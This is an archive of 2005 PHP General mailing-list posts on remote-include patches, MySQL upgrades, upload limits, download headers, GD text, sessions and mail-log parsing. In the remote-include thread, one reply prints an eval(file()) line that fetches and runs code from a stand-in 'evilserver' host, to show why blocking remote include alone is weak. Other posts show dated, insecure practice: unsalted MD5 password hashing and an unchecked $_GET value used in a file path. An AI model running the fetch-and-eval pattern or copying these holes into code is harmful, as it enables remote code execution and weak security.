Tell me - how do you want to turn off remote includes and remain remote file working? allow_url_fopen turns off _both_. There's no choice what to disable tom Jason Barnett wrote: Tom Z. Meinlschmidt wrote: Hi, I've experienced a lot of attacks in my hosting server due to silly users and their scripts with holes. So I prepared this little patch to 4.3.10, which disables using url wrappers in include/include_once/require/require_once statemens (switchable in php.ini). See readme.security from patch patch is there: http://orin.meinlschmidt.org/~znouza/php_patch.txt comments are welcome /tom http://php.net/manual/en/ini.php#ini.list allow_url_fopen = 0 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] How can I secure database passwords used by PHP webpages
Dan Tappin mailto:[EMAIL PROTECTED]
on Wednesday, March 02, 2005 7:32 AM said:
The best way is to not store the password at all.
Store a hash of the password like this:
INSERT INTO users SET pass = MD5('password');
Now not knowing how you authenticate those passwords this might not
work.
If it's an internal web page via PHP all you do is MD5 the users
supplied password and compare to you DB.
But that doesn't help in this situation because the OP is not referring
to passwords for users of the website but rather the password(s) for
MySQL so that the application can access the db.
Chris.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] update of mysql to 4.x
Hi, i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i can't find any serious information if i would have to rebuild php too. anybody tryed this already?? system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52 thanks peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] update of mysql to 4.x
Peter wrote: Hi, i'm thinking of updating my mysql-server from 3.23 to 4.1.10, and i can't find any serious information if i would have to rebuild php too. anybody tryed this already?? system: debian linux, apache 1.3.31, php 4.3.9, mysql 3.23.52 thanks peter Please don't spam the list with multiple messages asking the same question. Before you 'upgrade', ask youself, Do I need to upgrade?. What features do you need in 4.1.x that are not present in 3.x? If the answer to that is 'none', you're probably better off leaving it alone. If you still fell you _have_ to upgrade, think about using the 4.0.x version instead of 4.1.x. If you 'upgrade' to MySQL 4.1.x, and don't go with PHP5, you really haven't done anything for your apps, as you won't be able to take advantage of some of the new features. -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Open source portal systems???
I recommend Mambo or Geeklog. They aren't overdone and pretty easy to implement. Best of all, they are free. Jud. Judson Vaughn [EMAIL PROTECTED] | [EMAIL PROTECTED] Seiter Vaughn Communications 12455 Plowman Court Herndon, VA 20170 703.450.9740 svc Kostyantyn Shakhov wrote: I've got an order for the media portal. Thus, I'm looking for an open source portal systems. First that comes to my mind is PHP-Nuke, but I heared that it requires a powerful server and i'll have just a middle-level one. So, could someone knows another PHP-based open source portal systems? Thank you in advance. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Bypassing php.ini setting for file uploads?
Hi, I am trying to modify the php.ini settings for post_max_size and upload_max_filesize to allow for a custom script to upload files larger than 8MB, the default size limit set in php.ini. This is on a shared server, and my hosting company won't modify the limitation, although they will charge me $50/hr to code a custom script. Whatever! I'll just do it myself... but I don't know how. Also, http://docs.php.net/en/function.ini-set.html tells me that for post_max_size and upload_max_filesize: Entry can be set in php.ini, .htaccess or httpd.conf. Any help would be greatly appreciated!! Thanks, Matt Cassarino Cell: (206) 484-4626 Web: www.mattcass.com Email: [EMAIL PROTECTED]
[PHP] Download with header() - file corrupted
I try to download a file wit follow code: $len = filesize($file); $filename = basename($file); header(Pragma: public); header(Expires: 0); header(Cache-Control: must-revalidate, post-check=0, pre-check=0); header(Cache-Control: public); header(Content-Description: File Transfer); header(Content-Type: $ctype); $header=Content-Disposition: attachment; filename=.$filename.;; header($header ); header(Content-Transfer-Encoding: binary); header(Content-Length: .$len); readfile($file); exit; All works pretty well, the filename is correct, the Content Type and the file size. When I try to open the downloaded file I see nothing. The source file on the web server works great. I played with Content-Transfer-Encoding and tried all values from the RFC Any ideas? thank you -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] FREETYPE and GD
Hello, I've created a simple script that takes in image and draws some lines and some text on top of it. I am having a problem with the text part of this. When the string that I am drawing on the image contains and apostrophe ( ' ) there is always a backslash ( \ ) before it. It make sense that it is the escape character, but I need to be able to show the apostrophe. Anyone have any ideas about this? ?php $backdir = /var/www/html/backgrounds/; $im = ImageCreatefromJPEG($backdir.$_GET['background']); $textcolor = imagecolorallocate($im, 255, 255, 255); $font = /var/www/html/fonts/arial.ttf; imagepolygon($im, array(36, 24, 36, 456, 684, 456, 684, 24), 4, $textcolor); imagepolygon($im, array(72, 48, 72, 432, 648, 432, 648, 48), 4, $textcolor); maketext($im, 30, 0, 360, 240, $textcolor, $font, $_GET['toparea']); Header(Content-type: image/jpeg); Imagejpeg($im); imagedestroy($im); ? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: PHP 5.1 CVS Interface Question
Stolen from a oo reference site (who's URL I no longer have handy): An object interface--or simply interface--defines methods that can be implemented by a class. Interfaces are declared like classes, but cannot be directly instantiated and do not have their own method definitions. Rather, it is the responsibility of any class that supports an interface to provide implementations for the interface's methods. A variable of an interface type can reference an object whose class implements that interface; however, only methods declared in the interface can be called using such a variable. That goes with my understanding as interfaces being one more level of abstraction from abstract classes. That is they define the rules for the classes that implement them, but not any code (where an abstract class can implement code). I guess my understanding of an interface is wrong? The reason I want to use an interface is to define a preset definition of what my classes should implement when they are designed using specific design patterns. Gavin On Wed, 02 Mar 2005 03:17:59 +0100, Jochem Maas [EMAIL PROTECTED] wrote: Jason Barnett wrote: Gavin Roy wrote: ... Is this a bug, or a new intended behavior? Gavin To get the long answer you can search through the php.internals list for this topic. The short answer is: this is the new intended behavior. the short reason(ing) is it doesn't make sense to implement an interface on something that isn't an object (i.e. a class). assume object == car, and class == idea, an idea can't have a steering wheel interface because its not a 'thing' (as such). if you have a collection of singleton objects that all implement a public interface then should those objects be singletons at all? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] php DBMS
Thanks for all your responses, but I think I wasn't clear enough of my intentions. Actually, that what I'm looking for; A database engine written in PHP. I know this is not the most effecient way, but I'm not planning to use it for heavy weight database-driven-application. I just want a way to store simple data and I thought this SQL would be a nice interface. Since it could be easelly ported to mysql. John Holmes [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] Gerben wrote: I'm wondering if there is any DBMS, like MySQL, which is (fully) implemented in php. This so you don't have to buy a MySQL database. I'm currently trying to put something together, but this would be a waste of time if it already exists. SQLite is probably what you're after. It comes with PHP5 and can be built into PHP4, iirc. Of course, I'm assuming what you mean by fully implemented is included with PHP, not written with it. A database written in PHP would not be good, imo. -- ---John Holmes... Amazon Wishlist: www.amazon.com/o/registry/3BEXC84AB3A5E/ php|architect: The Magazine for PHP Professionals www.phparch.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] sql query
OK got that. Thanks...
Jason Petersen [EMAIL PROTECTED] kirjoitti
viestissä:[EMAIL PROTECTED]
On Wed, 2 Mar 2005 13:02:39 +0200, William Stokes [EMAIL PROTECTED]
wrote:
Hello
Can someone explain this to me. I don't know how to read this.
if (!$variable = mysql_query(select id,sessid from users where ...
What is this if(!
This is a way to run a SQL query, capture the return value, and
perform an action if the query failed. For code readability, I would
probably write that as two statements:
$variable = mysql_query(SELECT * FROM blah);
if(!$variable) { error_handler(mysql_error()); }
See the documentation for information on mysql_query return values:
http://us2.php.net/manual/en/function.mysql-query.php
Jason
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] FREETYPE and GD
Aaron Todd wrote: I've created a simple script that takes in image and draws some lines and some text on top of it. I am having a problem with the text part of this. When the string that I am drawing on the image contains and apostrophe ( ' ) there is always a backslash ( \ ) before it. It make sense that it is the escape character, but I need to be able to show the apostrophe. Anyone have any ideas about this? ?php $backdir = /var/www/html/backgrounds/; $im = ImageCreatefromJPEG($backdir.$_GET['background']); Because you have Magic Quotes GPC on, all GET/POST/COOKIE data automatically has addslashes called on it, before you see it. That's good because you are probably usually putting your data into a MySQL database that needs that. In this case, though, you want to use http://php.net/stripslashes to undo the automated addslashes of Magic Quotes. Or, if your site mostly/only takes GET data and puts it on images, and rarely puts it into the database, go ahead and turn Magic Quotes GPC off in php.ini (or in your .htaccess) Note that you can't turn it off in your script with ini_set since the GPC data is already altered by the time your script starts. GD is not really directly involved, per se, in this issue. You'd have the same problem if you were putting your GET data into a file, or displaying it directly to the user, or pretty much doing anything at all with it *except* for stuffing it into MySQL. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Download with header() - file corrupted
Werner Jäger wrote: I try to download a file wit follow code: $len = filesize($file); $filename = basename($file); header(Pragma: public); header(Expires: 0); header(Cache-Control: must-revalidate, post-check=0, pre-check=0); header(Cache-Control: public); Is it kosher to have two Cache-Control headers?... More important, do the browsers actually follow the spec if it *IS* kosher. I'd sure try to get rid of one of these. header(Content-Description: File Transfer); header(Content-Type: $ctype); What's $ctype? It *SHOULD* be application/octet-stream if you want to force a download. $header=Content-Disposition: attachment; filename=.$filename.;; header($header ); header(Content-Transfer-Encoding: binary); header(Content-Length: .$len); readfile($file); exit; All works pretty well, the filename is correct, the Content Type and the file size. Is $file a FULL pathname to the file, starting from /, such as: /usr/home/full/path/to/file.txt *NOT* just from DocumentRoot or the current directory? While I would expect filesize and readfile to behave the same, I'd say *always* use full path for both. When I try to open the downloaded file I see nothing. I'm assuming the file size is not 0, which would mean that technically everything is working fine, given what you have described :-) The source file on the web server works great. If you want to force a download, use: header(Content-type: application/octet-stream); Every browser ever made knows that means download I played with Content-Transfer-Encoding and tried all values from the RFC *WHICH* RFC?... I gotta tell you, I've never had to use *THAT* many headers to get a download. Maybe you're just trying too hard, and using all the made-up headers of an RFC that was never widely implemented/adopted... (Hint: If it was written by Microsoft, it usually means only IE actually follows that standard and there is usually a better pre-exsiting standard/RFC that everybody else follows) -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] php DBMS
Gerben mailto:[EMAIL PROTECTED] on Wednesday, March 02, 2005 10:22 AM said: Thanks for all your responses, but I think I wasn't clear enough of my intentions. Actually, that what I'm looking for; A database engine written in PHP. Even if something like this did exist why would you want it over MySQL? Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Bypassing php.ini setting for file uploads?
There're all kinds of threads on this if you google around for a bit but one good on in my bookmarks is: http://www.webdevforums.com/showthread.php?t=7231 Ian On Wed, 2005-03-02 at 09:39 -0800, Matt Cassarino wrote: Hi, I am trying to modify the php.ini settings for post_max_size and upload_max_filesize to allow for a custom script to upload files larger than 8MB, the default size limit set in php.ini. This is on a shared server, and my hosting company won't modify the limitation, although they will charge me $50/hr to code a custom script. Whatever! I'll just do it myself... but I don't know how. Also, http://docs.php.net/en/function.ini-set.html tells me that for post_max_size and upload_max_filesize: Entry can be set in php.ini, .htaccess or httpd.conf. Any help would be greatly appreciated!! Thanks, Matt Cassarino Cell: (206) 484-4626 Web: www.mattcass.com Email: [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Bypassing php.ini setting for file uploads?
Matt Cassarino wrote: I am trying to modify the php.ini settings for post_max_size and upload_max_filesize to allow for a custom script to upload files larger than 8MB, the default size limit set in php.ini. This is on a shared server, and my hosting company won't modify the limitation, although they will charge me $50/hr to code a custom script. Whatever! I'll just do it myself... but I don't know how. Also, http://docs.php.net/en/function.ini-set.html tells me that for post_max_size and upload_max_filesize: Entry can be set in php.ini, .htaccess or httpd.conf. Some Good News You can create a file named .htaccess in the same directory as your file upload script, and put this in it: php_value post_max_size 32M php_value upload_max_filesize 32M Use any valid value you like instead of 32M of course. Yes, there really *should* be a dot (.) at the front of the filename: .htaccess Your FTP software and your desktop machine may give you grief about it, but the web-server *needs* it to be that name. If you already have an .htaccess file with other stuff in it, which you may or may not understand, just add the above lines at the bottom. Their custom script would have to do this exact same thing to make it work, so there ain't much point to giving them $50/hr for that. :-) Some Bad News Your web host *might* have .htaccess turned off for performance reasons, in which case you are screwed. It's unlikely, but possible. They ain't gonna turn .htaccess on just for you, because then it's on for everybody and slows down the server a little bit. And they probably won't even change the settings for max_XYZ in httpd.conf for you, not even for $50. If by some chance they *will* do that, it's a 2-minute job, so don't let them charge you more than $50 for that! -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] php DBMS
Chris W. Parker on Wednesday, March 02, 2005 10:38 AM said: Gerben mailto:[EMAIL PROTECTED] on Wednesday, March 02, 2005 10:22 AM said: Thanks for all your responses, but I think I wasn't clear enough of my intentions. Actually, that what I'm looking for; A database engine written in PHP. Even if something like this did exist why would you want it over MySQL? Now for something more constructive: I found this http://www.c-worker.ch/txtdbapi/index_eng.php. Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Connecting to a AS/400?
Frank Arensmeier wrote: Is there anyone who has some experience in connecting to a IBM AS/400 server with PHP? Any ideas where to start? I know somebody reported success back in the day on this list... Actually, it's so far back in the day, it just might be on the predecessor to this list, back when all PHP discussion took place pretty much on one single list... But I don't think it's *that* far back. Worst case, we're talking back in PHP 3.0 Beta/Release Candidate days, possibly, but not before, as that's when I joined up. I think they were using AS400 or AS 400 without the / in their posts. IIRC (and that's a big IF): They originally had nothing, then they got read access, then they achieved write access, finally, but I think there was something really skanky about getting the write access that made them not real happy with the solution... Like I think it required having root be a bit too wide open permissive on the AS/400 end. Fortunately, the list archives of this list and even that old list are linked from: http://php.net/mailing-lists.php Start with the PHP-General, as I suspect it's in there, though it *could* be back in the old old list. PS I'm assuming you want to connect to the database on an AS/400 and that that database is the standard and only database that shipped on those suckers. P-something, right? PPS You'd probably be best off getting a CSV dump and migrating to hardware/OS less, shall we say, antiquated? :-) PPPS I'm not sure if I've ever *seen* an AS/400, so this is definitely highly suspect info in this post. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
Tom Z Meinlschmidt wrote:
Tell me - how do you want to turn off remote includes and remain remote
file working?
Change the PHP source?
That's the only viable answer I can think of; though I doubt it's one you
want to hear/use.
Sorry.
allow_url_fopen turns off _both_. There's no choice what to disable
Consider this:
?php
eval(implode('',file(http://evilserver.example.com;)));
?
So, like, what's the point to turning off only remote include and keeping
remote file?
Maybe you'll stop a naive newbie from something stupid, but probably not
even slow down a script kiddie, much less a dedicated attacker.
For that matter, even a naive newbie would be able to figure out the
eval(file()) solution or Google for it and find it in less than an hour.
If you turn off eval, they make a file 777 (ugh!) and then read the remote
file, write it into their 777 file, and then include that.
If you don't trust remote include, you can't trust remote files and vice
versa. That's all there is to it, really.
Anything else is simply self-delusions of security imho. [shrug]
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] patch to php 4.3.10 to disabling URL wrappers in include like statements
Bostjan Skufca @ domenca.com wrote:
From system security's standpoint:
?php
$content = file_get_contents('http://www.domain.net/file.inc');
echo $content;
?
is OK, but
?php
include('http://www.domain.net/file.inc');
?
is NOT!
Nice patch, Tom, will probably use it myself too...
I'll be interested to see if it works in practice...
[see previous post of mine]
Ya never know.
I still haven't figured out why spam harvesters don't find even the
simplest obfuscations like %40 and #64;
But I guess if you come up with a billion fish every time you cast your
line, you don't worry about buying better bait.
I *suspect* this situation is different, in that you will have people
actively trying to alter their attacks to bypass this blockage, and it's
pretty simple to bypass.
But, perhaps, it will turn out to be that there are so many unpatched
wide-open places they can find that they'll never bother you again.
I sure hope so, for your sake!
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Document root, preferred way to find it???
I've been using in my scripts $_SERVER['DOCUMENT_ROOT'] to find the base path for includes, etc. We just moved the site to a new virtual host and it doesn't work. print_r() gives me: $_SERVER['document_root']= /usr/local/apache/htdocs $_SERVER['path_translated']= /home/user/public_html/ What do you guys use for you docroot? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] PHP Sessions?
Hi everyone, I am trying to work with the idea of sessions in PHP.
Basically I have a self-processing script called index.php but somehow I
keep losing my session variable, it works the first time around but when
I call it the second time around its gone? I do not reset the variable
or destroy the session are there any other reasons why this might occur?
The basic layout of the script is this(note this is not the full script,
I've just posted the relevant code and left out the other stuff.)
?php
if($_POST[username]==rory){//if user logs in as rory start session
session_start();
header(Cache-control: private);
$_SESSION['loggedin'] = yes;
}
/*It enters the first time but when I call the script again from the
form below this one the session variable is empty?*/
if(strlen($_SESSION['loggedin'])2){
if($_POST[verify]==yes){
die(test);
$CONTENT .= font color = \red\Your changes have been
made./fontbr;
}
$CONTENT = You are currently logged in as .$_POST[username].
form action=\index.php\ method=\POST\
input type=\submit\ value=\Log out\ /
input type=\hidden\ name=\logout\ value=\yes\//form
hrIf you would like to change the text on the main page please click here
a href=\index.php?page=$PAGE_TITLEaction=edit\font
color=\blue\Edit intro page/afont color =\#136863\hrh3File
Upload./h1hr Any files will appear in the 'students' page of the
website. Files that uploaded here are not availablre to the public and
can only be acccessed by students who have logged in. Because of
security issues only well know file types such as word, acrobat and text
files are legible for upload.
form enctype=\multipart/form-data\ action=\index.php\ method=\POST\
!-- MAX_FILE_SIZE must precede the file input field --
input type=\hidden\ name=\MAX_FILE_SIZE\ value=\3\ /
!-- Name of input element determines name in $_FILES array --
Send this file: input name=\userfile\ type=\file\ /
input type=\submit\ value=\Upload\ /
input type=\hidden\ name=\arg1\ value=\yes\
/form;
}
if ($action == edit)
/*when user submits this is should call teh
script again and enter the test above but it doesn't?*/
{
$CONTENT =
form method=\post\ action=\index.php\
textarea name=\content\ cols=\60\ rows=\20\$CONTENT/textarea
input type=\hidden\ name=\page\ value=\$PAGE_TITLE\ /br/
input type=\submit\ value=\$DONE_BUTTON\ /
input type=\hidden\ name=\verify\ value=\yes\//form;
}
Cheers,
Rory.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] mailserver logfile analyser
woldhekkie wrote:
Our mailserver writes a logfile every day, but it takes hours to analyse
it
manualy.
I (newby) am trying to write a php script that reads the the logfile line
by
line and try to get a top 50 of spammers/clients that mail too much...
I can get line by line all information like email-adres, from , to , bytes
send , but how to store it in a array ?
If a line is read and the emailadres already pressent in the array, it
should not ad this emailadress again, but add a counter +1
In the end i want an array containing all emailadreses and how often they
were counted.
This is how far i get: (sorry, it is in Dutch)
It shows all from and to emailadresses. Not bad for a newby, but it took
one
week to do.
?php
$fp=;$line=;$aantal=0;
$emails = array(); //maybe use $froms = array(); $tos = array();
echo TABLE BORDER=3;
echo TRTD ALIGN=\center\ From:/TDTD
ALIGN=\center\To:/TD/TR;
if($fp = fopen(C:\smtp\SMTP-Activity-050226.log,r)) {
while (!feof ($fp)) {
$line = fgets($fp, 4096);
if(strstr($line,SMTP-IN)) {
if(strstr($line,MAIL FROM )) {
$aantal++;
$start=strpos($line,);
$end=strpos($line,);
$from=str_replace(, , str_replace(, ,
substr($line,$start,$end-$start)));
$emails[$from]++; //maybe use $froms[$email]++;
//Fancier version:
$emails[$from] = isset($emails[$from]) ? $emails[$from] + 1 : 1;
echo TRTD.$from./TD;
}
if(strstr($line,RCPT TO )) {
$start=strpos($line,);
$end=strpos($line,);
//Same pattern as above
$to = str_replace(, , str_replace(, ,
substr($line,$start,$end-$start)));
$emails[$to]++;
echo TD . str_replace(, , str_replace(, ,
substr($line,$start,$end-$start)))./TD;
}
}
}
echo /TR/TABLE;
fclose($fp);
}
echo Totaal aantal: $aantal BR;
echo Top 10:table;
arsort($emails);
reset($emails);
for ($i = 0; $i 10; $i++){
list($email, $count) = each($emails);
echo trtd align='right'$email/tdtd
align='right'$count/td/tr\n;
}
echo /table;
//If you want $froms/$tos separate, copy/paste code above and do it for both
?
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Connecting to a AS/400?
Richard, you are my man! Thank you for the hints you gave me. I will do some digging in the list archives tonight. Thank you. /frank 2005-03-02 kl. 19.57 skrev Richard Lynch: Frank Arensmeier wrote: Is there anyone who has some experience in connecting to a IBM AS/400 server with PHP? Any ideas where to start? I know somebody reported success back in the day on this list... Actually, it's so far back in the day, it just might be on the predecessor to this list, back when all PHP discussion took place pretty much on one single list... But I don't think it's *that* far back. Worst case, we're talking back in PHP 3.0 Beta/Release Candidate days, possibly, but not before, as that's when I joined up. I think they were using AS400 or AS 400 without the / in their posts. IIRC (and that's a big IF): They originally had nothing, then they got read access, then they achieved write access, finally, but I think there was something really skanky about getting the write access that made them not real happy with the solution... Like I think it required having root be a bit too wide open permissive on the AS/400 end. Fortunately, the list archives of this list and even that old list are linked from: http://php.net/mailing-lists.php Start with the PHP-General, as I suspect it's in there, though it *could* be back in the old old list. PS I'm assuming you want to connect to the database on an AS/400 and that that database is the standard and only database that shipped on those suckers. P-something, right? PPS You'd probably be best off getting a CSV dump and migrating to hardware/OS less, shall we say, antiquated? :-) PPPS I'm not sure if I've ever *seen* an AS/400, so this is definitely highly suspect info in this post. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Authentication fails
On the other hand, when the form action script is the *same* script that contains the form, when I do the same var_dumps, the data does *not* have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is GET, not POST in this instance. My suspicion was that this was what had happened as well, but *why* your POST is being interpreted as a GET is unclear to me. I did notice that you were sending GET variables when you had a login error... but someone more knowledgeable than I (Richard?) will likely come along and explain how / why PHP can interpret a form with both POST and GET variables as a GET script. As I recall, the POST format simply allows GET data as well. Almost for sure POST came after GET, in terms of historical web techniques. So when they made the spec for POST, GET data was included already. I don't think PHP does any magic to make it work, really... If his form says: method=post and it's not sending POST and the REQUEST_METHOD isn't POST, then the httpd server (mini_httpd, right) is almost for sure at fault. I'm repeating myself, but PHP pretty much just takes whatever the SERVER sends it, and fills in $_SERVER and $_POST and $_GET based on that. Fix mini_httpd and/or its configuration if you want to get $_POST to work. You'll need to ask mini_httpd experts how to do that... Which ain't here. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Authentication fails
I've got some more information and I hope someone can help me figure out the problem. I changed my original PHP program so that the form action script is a different script. In that file, I just do a var_dump on $_POST and $_SERVER. When I do that, it looks like all of the data comes through correctly. On the other hand, when the form action script is the *same* script that contains the form, when I do the same var_dumps, the data does *not* have any $_POST data. Also, the _SERVER[REQUEST_METHOD] is GET, not POST in this instance. So it appears that my problem is that when I post to the same script I am running, things don't work. I still have no idea why this would be the case. Does anyone have any ideas? Whoops! You're *not* the mini_httpd guy, are you? Sorry, crossed my threads. Start digging into httpd.conf and look real careful at any changes involving POST/GET and METHOD etc. 'diff' your httpd.conf with the one that ships out with the software. (See man diff) -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Logging with PHP to SMTP server
kioto wrote:
Richard Lynch wrote:
kioto wrote:
Hi all, there is a way to create log-system to authenticate to smtp
server ?
I don't understand the log-system part of this...
You can authenticate to SMTP, depending on what the SMTP server considers
suitable credentials.
And you could write your script to log the results of that...
I'm assuming SMTP servers usually have log files, and you could use PHP
to
read them and do something with them.
Maybe repost your question with more detail of what you want to happen.
I want use my account with my provider to authenticate and use my SMTP to
send e-mail with my-script. I want use the smtp to send various email
and i want to try to log with my account. I want to try at the same system
of pop3 connection to read mail-box
For example:
$box = imap_open({my.host.it}INBOX, user, pasw);
My provider allow to use SMTP only from web-mail(web-browser) but not
with
external program then i want to try to develop log-in system to use my
account
with SMTP to send any e-mail.
I hope that my language it's clearly to understand the concept.
If your host doesn't let you use SMTP directly (not through their webmail)
you probably can't do that: use SMTP directly.
But you maybe *can* use PHP with imap_open (as in your example) to do it.
When your host says not use SMTP directly they may mean:
not use fsockopen to talk to SMTP and send email
They probably do not mean:
not use imap_open to manage your email
You'll have to write your imap_open script and find out.
They *MIGHT* mean that you can't do it, and it *might* be based on which
machine your imap_open is saved on. For example, my host has a different
computer/box for all email and the web-server is not the same computer at
all.
Fortunately, he lets me use imap_open from his web box to his email box --
I have a custom PHP script that throws out a lot of junk that spam
assassin doesn't catch, and I'd be in real trouble without that.
Easiest solution might be to find a new host, or even just put your IMAP
application and email on a new host, and start forwarding email from your
current host to that one.
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: patch to php 4.3.10 to disabling URL wrappers in include like statements
On Thursday 03 March 2005 03:04, Richard Lynch wrote:
Tom Z Meinlschmidt wrote:
Tell me - how do you want to turn off remote includes and remain
remote file working?
Change the PHP source?
That's the only viable answer I can think of; though I doubt it's one
you want to hear/use.
Sorry.
Funnily enough I think you'll find that he did (change the source) :)
allow_url_fopen turns off _both_. There's no choice what to disable
Consider this:
?php
eval(implode('',file(http://evilserver.example.com;)));
?
So, like, what's the point to turning off only remote include and
keeping remote file?
I believe you're missing the point of the patch. It is to prevent people
from injecting malicious remote locations in $somewhere:
include($somewhere);
Of course one should always validate $somwhere before using it but ...
--
Jason Wong - Gremlins Associates - www.gremlins.biz
Open Source Software Systems Integrators
* Web Design Hosting * Internet Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
New Year Resolution: Ignore top posted posts
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Setting cookie on first visit
Tom Whitbread wrote:
I am using a cookie to detect what skin a user wants to display. The
problem is if a user visits the site for the first time the cookie is
not being set. I am detecting if its being set or not with
if(!isset($_COOKIE['skin'])){ ... }
It's not setting the cookie untill a user refreshes the page once. How
can I ensure it's set when it hasnt been set before?
Sure it's being set.
That's how you see it when they refresh the page.
$_COOKIE tells you want Cookies the browser *sent* with the request for
the URL.
It's up to you to track within that script what Cookies you are sending
*back* with the answer.
That sounds kinda harsh, and I can see why you'd want it to work the other
way -- as I first did.
But you *need* COOKIES to be what the browser sent initially.
I guess you *could* start doing things like:
?php
setcookie('var', $value);
$_COOKIES['var'] = $value;
?
and then it would do what you want...
But you could quickly confuse yourself about what came *in* from the
browser and what you are sending *out* to the browser.
Probably better for you to take a step back and think about how cookies
work, and who sends what where.
--
Like Music?
http://l-i-e.com/artists.htm
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Connecting to a AS/400?
According to Larry Hotchkiss on Jan 31,2001 Quote Its my understanding that you use the odbc functions to access db/2 400. I also recall reading that the db2/400 functionality is true db2 functionality and does not use the generic odbc layer even though it is grouped in. Apparently its smart enough to know. Depending on where you got your windows ver of php, you should just be able to uncomment the line in your php.ini so it can use odbc and make sure the extension path is set correctly. end Quote -- ?php /* Stephen Johnson c | eh The Lone Coder http://www.thelonecoder.com [EMAIL PROTECTED] 562.924.4454 (office) 562.924.4075 (fax) continuing the struggle against bad code */ ? From: Richard Lynch [EMAIL PROTECTED] Reply-To: [EMAIL PROTECTED] Date: Wed, 2 Mar 2005 10:57:30 -0800 (PST) To: Frank Arensmeier [EMAIL PROTECTED] Cc: php list general php-general@lists.php.net Subject: Re: [PHP] Connecting to a AS/400? Frank Arensmeier wrote: Is there anyone who has some experience in connecting to a IBM AS/400 server with PHP? Any ideas where to start? I know somebody reported success back in the day on this list... Actually, it's so far back in the day, it just might be on the predecessor to this list, back when all PHP discussion took place pretty much on one single list... But I don't think it's *that* far back. Worst case, we're talking back in PHP 3.0 Beta/Release Candidate days, possibly, but not before, as that's when I joined up. I think they were using AS400 or AS 400 without the / in their posts. IIRC (and that's a big IF): They originally had nothing, then they got read access, then they achieved write access, finally, but I think there was something really skanky about getting the write access that made them not real happy with the solution... Like I think it required having root be a bit too wide open permissive on the AS/400 end. Fortunately, the list archives of this list and even that old list are linked from: http://php.net/mailing-lists.php Start with the PHP-General, as I suspect it's in there, though it *could* be back in the old old list. PS I'm assuming you want to connect to the database on an AS/400 and that that database is the standard and only database that shipped on those suckers. P-something, right? PPS You'd probably be best off getting a CSV dump and migrating to hardware/OS less, shall we say, antiquated? :-) PPPS I'm not sure if I've ever *seen* an AS/400, so this is definitely highly suspect info in this post. -- Like Music? http://l-i-e.com/artists.htm -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] update of mysql to 4.x
